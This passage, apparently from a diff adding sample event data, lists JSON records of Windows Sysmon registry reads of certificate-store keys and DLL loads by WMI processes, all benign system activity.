"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msscntrs.dll", + "image_path": "C:\\Windows\\System32\\msscntrs.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479950016, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "perfdisk.dll", + "image_path": "C:\\Windows\\System32\\perfdisk.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479950016, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "perfnet.dll", + "image_path": "C:\\Windows\\System32\\perfnet.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479950016, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + 